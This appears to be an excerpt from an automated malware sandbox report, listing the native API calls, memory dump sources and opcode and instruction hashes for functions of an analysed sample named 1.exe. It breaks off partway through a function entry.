Instruction Fuzzy Hash: BDF0F671404388DEEB248A0ADC84B62FFA8EF45334F18C45AED480F386C3799844CA70

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02C8DC60 Relevance: .5, Instructions: 525COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2020907498.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2104ad378856f4d155686e8994e61b2c7db41f7e6d67c825038ba6ea40bdc553
Instruction ID: 327e4551fc1715009393c4680fddcab8ca05cac725aaeb28d53157ef31b13f5b
Opcode Fuzzy Hash: 2104ad378856f4d155686e8994e61b2c7db41f7e6d67c825038ba6ea40bdc553
Instruction Fuzzy Hash: D4524AB99C0745CFD710CF26E88829A7BF1BBA2318BD18A19D1515B2E0D77465EBCF40

Uniqueness

Uniqueness Score: -1.00%

Function 02C8C4D4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2020907498.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3d3426cd8c717f295c6a39903bb79dad3de3cbdebcbebe0fd8783cc8e25d938
Instruction ID: 691f4da4247ee55be55b28fcb6c5df9f205854667e26978c82a6fb8153ad357b
Opcode Fuzzy Hash: b3d3426cd8c717f295c6a39903bb79dad3de3cbdebcbebe0fd8783cc8e25d938
Instruction Fuzzy Hash: D8A17032E002158FCF19EFB5C84059EBBB2FF85308B15856BE805AB261DB31EA56DF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 1.exePID: 2136, Parent PID: 1892COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	2.9%
Signature Coverage:	5.1%
Total number of Nodes:	583
Total number of Limit Nodes:	68

Executed Functions

Function 00418260 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 0041829D, 004182A4
B=A, xrefs: 00418282, 00418290

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181AB Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 97e6952de493ed015694820faf214468de508fc38208e75ba4bb0fa0a149175e
Instruction ID: 579c47b66a50762c9046e5d69bb4e5f4b247f3e1619ec11044849e118c73ab7e
Opcode Fuzzy Hash: 97e6952de493ed015694820faf214468de508fc38208e75ba4bb0fa0a149175e
Instruction Fuzzy Hash: 4C01B6B2605109AFCB48CF88DC95EEB77A9AF8C354F15825CFA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041838A Relevance: 1.5, APIs: 1, Instructions: 33
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: a1d266caba0c40d36f1152353410bec2def7f62f2a47592cafb4686cb19c8ea9
Instruction ID: 8b0bb95d783cbc1b701d714e61735077881fea63b8131ca19b210858b3b160a7
Opcode Fuzzy Hash: a1d266caba0c40d36f1152353410bec2def7f62f2a47592cafb4686cb19c8ea9
Instruction Fuzzy Hash: 95F0FE712002086FCB14DF99DC41EE777ADEF88754F114649FE1897281C630E810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418390 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 01762B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762B6A

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
Instruction ID: 6337b76b7c43efd9f372869b640c8484cec07f3ad79985103abda25e8bdfebe6
Opcode Fuzzy Hash: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
Instruction Fuzzy Hash: EA90026120650003460571588418616800A97E0201F56C031E10145A0DC5258A916226

Uniqueness

Uniqueness Score: -1.00%

Function 01762BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762BFA

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 307f54e14c0a11529613c0adb7111d100e86a3f3acaebeaf713f840171b7bd9a
Instruction ID: ba0227ef09325f0c1c79577f04145f88b630df89539712e1318c10468169fc13
Opcode Fuzzy Hash: 307f54e14c0a11529613c0adb7111d100e86a3f3acaebeaf713f840171b7bd9a
Instruction Fuzzy Hash: 7490023120550802D6807158840864A400597D1301F96C035A0025664DCA158B5977A2

Uniqueness

Uniqueness Score: -1.00%

Function 01762AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762ADA

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: af822ff0ca7abf6a0152b99e903ad33737f7fd5e6caf58bab666df4e0a19412b
Instruction ID: f3a278736c3d0b104c3b7b95493499654c0e79b644abde0cd659de498126eb95
Opcode Fuzzy Hash: af822ff0ca7abf6a0152b99e903ad33737f7fd5e6caf58bab666df4e0a19412b
Instruction Fuzzy Hash: 8F900225215500030605B5584708507404697D5351756C031F1015560CD6218A615222

Uniqueness

Uniqueness Score: -1.00%

Function 01762D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762D3A

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c2506ff7880a8f1d2f8de661288ebbb2f96d90664aef1efb2c0aae20b7a6697
Instruction ID: 241eb77a3f01bea4e4816fc94d0724dfb22e7d2114b791f4472a6e1b9a9fe36d
Opcode Fuzzy Hash: 9c2506ff7880a8f1d2f8de661288ebbb2f96d90664aef1efb2c0aae20b7a6697
Instruction Fuzzy Hash: 8990022130550003D6407158941C6068005E7E1301F56D031E0414564CD9158A565323

Uniqueness

Uniqueness Score: -1.00%

Function 01762D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762D1A

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fc24eb850970b50978852d610c4c11e7cffcb17b6e315fe70d03ab141af8da8f
Instruction ID: 961e57edceb6e5fb3b6fc91422f37daa204f0a112674188c222c09ddb10381dc
Opcode Fuzzy Hash: fc24eb850970b50978852d610c4c11e7cffcb17b6e315fe70d03ab141af8da8f
Instruction Fuzzy Hash: 5290022921750002D6807158940C60A400597D1202F96D435A0015568CC9158A695322

Uniqueness

Uniqueness Score: -1.00%

Function 01762DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762DFA

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
Instruction ID: cea4abfb9cc1eb233845dc36da57caeb39240fba3e9cd19a742e2b05b132e912
Opcode Fuzzy Hash: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
Instruction Fuzzy Hash: C890023120550413D61171588508707400997D0241F96C432A0424568DD6568B52A222

Uniqueness

Uniqueness Score: -1.00%

Function 01762DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762DDA

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
Instruction ID: 4858db9347b7c00d9a8e49871105bdeaa2f65f55dac96da7633f0ed2fd79339e
Opcode Fuzzy Hash: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
Instruction Fuzzy Hash: 16900221246541525A45B15884085078006A7E0241B96C032A1414960CC5269A56D722

Uniqueness

Uniqueness Score: -1.00%

Function 01762C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762C7A

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
Instruction ID: aed9606ee08badf7a23248ad7d5174f471a0b4191f1a393b34f8bfbd2925981e
Opcode Fuzzy Hash: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
Instruction Fuzzy Hash: AC90023120558802D6107158C40874A400597D0301F5AC431A4424668DC6958A917222

Uniqueness

Uniqueness Score: -1.00%

Function 01762CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762CAA

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
Instruction ID: edd33cef6e60a76d43f340a3144c32e8386aeb73aa9904fb71a9acbc983858a1
Opcode Fuzzy Hash: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
Instruction Fuzzy Hash: 4B90023120550402D6007598940C646400597E0301F56D031A5024565EC6658A916232

Uniqueness

Uniqueness Score: -1.00%

Function 01762F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762F3A

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
Instruction ID: 9f22fc71efeff72b544323e8badad9e092b7e1bb31142e2b8b79f91c8a381334
Opcode Fuzzy Hash: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
Instruction Fuzzy Hash: 6290026134550442D60071588418B064005D7E1301F56C035E1064564DC619CE526227

Uniqueness

Uniqueness Score: -1.00%

Function 01762FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762FEA

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
Instruction ID: 2780cf273c5fc94c4fe614b103c12c95c624f9d3e9eabe41bc76b0d4db20d2a0
Opcode Fuzzy Hash: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
Instruction Fuzzy Hash: 66900221215D0042D70075688C18B07400597D0303F56C135A0154564CC9158A615622

Uniqueness

Uniqueness Score: -1.00%

Function 01762FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762FBA

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
Instruction ID: b3f1194d3bf4a1e2d2d04ebc4ca49bb1f1975e576d4decc26ca21a78ca90354e
Opcode Fuzzy Hash: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
Instruction Fuzzy Hash: 949002216055004246407168C8489068005BBE1211B56C131A0998560DC5598A655766

Uniqueness

Uniqueness Score: -1.00%

Function 01762F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762F9A

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
Instruction ID: ab7329b6292be6b87681da3e7e720df5087802b5c3885cf251b62602723777ae
Opcode Fuzzy Hash: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
Instruction Fuzzy Hash: E190023120590402D6007158881870B400597D0302F56C031A1164565DC6258A516672

Uniqueness

Uniqueness Score: -1.00%

Function 01762EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762EAA

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
Instruction ID: 4f6c544e1c9f4bc262954f19114bef7eff21486d5d7452fdcdf01c255ff79276
Opcode Fuzzy Hash: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
Instruction Fuzzy Hash: FC90027120550402D64071588408746400597D0301F56C031A5064564EC6598FD56766

Uniqueness

Uniqueness Score: -1.00%

Function 01762E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762E8A

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
Instruction ID: 5cec2eb2de273af7ef5c1b27adcc5ecc8f5f9795cd3ef70429dc22916a63c392
Opcode Fuzzy Hash: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
Instruction Fuzzy Hash: 3690022160550502D60171588408616400A97D0241F96C032A1024565ECA258B92A232

Uniqueness

Uniqueness Score: -1.00%

Function 017635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017635CA

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
Instruction ID: b4217b1437d65659a256b99a2095463e0f44cce8bd75ab5093f7e387ccb1db6f
Opcode Fuzzy Hash: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
Instruction Fuzzy Hash: EB90023160960402D60071588518706500597D0201F66C431A0424578DC7958B5166A3

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 004184B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Strings

hA, xrefs: 0041846C, 00418477

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: hA
API String ID: 3298025750-1221461045
Opcode ID: ef15e74b064e74b0f52b57a614e773c2510b04daacfd850acc6e6a3b244b7918
Instruction ID: fc15a581ebdc04b14b2df862697e5f61391ea54c29257dc10be113f391066e57
Opcode Fuzzy Hash: ef15e74b064e74b0f52b57a614e773c2510b04daacfd850acc6e6a3b244b7918
Instruction Fuzzy Hash: 2201D1B16042046BDB14EF68DC84DEB3769EF84350F044559FD0847342DA31E900CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00409B03 Relevance: 1.6, APIs: 1, Instructions: 59
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 41c43bad2fc3a238c5f41cec2c587da0123671538710b4c7bba37b82abee051f
Instruction ID: 0415a558d425215dfd9a0cd9e1db1421a215a4dce50c725a3f7da1f4387b0082
Opcode Fuzzy Hash: 41c43bad2fc3a238c5f41cec2c587da0123671538710b4c7bba37b82abee051f
Instruction Fuzzy Hash: 9F016F79E040495ECB10DB54A8D1DFEB720DB5530CF0401ABE85867383E976DE49CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00407260 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

